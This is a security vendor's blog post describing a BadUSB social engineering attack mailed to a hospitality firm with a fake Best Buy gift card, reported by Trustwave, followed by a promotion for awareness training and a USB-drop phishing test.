Hospitality Provider the Target of an Old-School BadUSB Social Engineering Attack

In what appears to be a mix of old- and new-school social engineering, an attack spotted in the wild using a USB thumb drive offers us a view into how one company could have become the victim.

One of the oldest forms of modern-day social engineering was the “dropping the malware-laden USB stick in the parking lot” scam. This month, security researchers at Trustwave clued the world in on an attempted USB drive-based scam (referred to as a BadUSB device) on one of their unnamed clients.

Here’s how it went down:

The client was mailed (MAILED!) a BestBuy gift card, a letter (on BestBuy letterhead) thanking them for their business and a USB Drive (which the letter indicated contained a list of items the gift card could be spent on).


Instead of falling for the scam, Trustwave was eventually called in to investigate.  Upon plugging in the BadUSB device into a test workstation, a PowerShell script was launched which downloaded a second PowerShell script and a Jscript-based malware bot, installed the malware and even posted a fake message box to establish with the victim why there’s no list of items to be purchased with the gift card.


The malware collects a wide range of information about the infected machine and sends it back to the command & control (C2) server and then jumps into a loop awaiting instructions from the C2 server.

This scam is a wonderful example of how simple social engineering, a stolen empty Best Buy gift card, and an inexpensive BadUSB device (which only costs about $7 USD), can be used to infect an organization with malware that can be used to do anything its designers desire in the future.

The question you need to ask yourself is would your users fall for it?

If so, you need them to be put through continual Security Awareness Training where they can learn about social engineering, the various forms of scams that exist (including ones like this one), and how to avoid becoming a victim of each.

Free USB Security Test

On average 45% of your users will plug in USBs. Find out now what your user’s reactions are to unknown USBs, with KnowBe4's new Free USB Security Test. Download our special, "beaconized" file onto any USB drive. Then label the drive with something enticing and drop the drive at an on-site high traffic area. If an employee picks it up, plugs it in their workstation and opens the file, it will "call home" and report the "fail" to your KnowBe4 console. And for Office documents, if the user also enables macros (!), additional data is tracked and geomapped.

USBHow your free 7-day USB Security Test works:

  • Fill out the form, and immediately...
  • Download "beaconized" Word, Excel or PDF files
  • Copy to any USB Drive, label and drop it
  • Reports on opens and if macros were enabled
  • Takes just a few minutes to set up

Test Your Users

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

Subscribe To Our Blog

Ransomware Hostage Rescue Manual

Get the latest about social engineering

Subscribe to CyberheistNews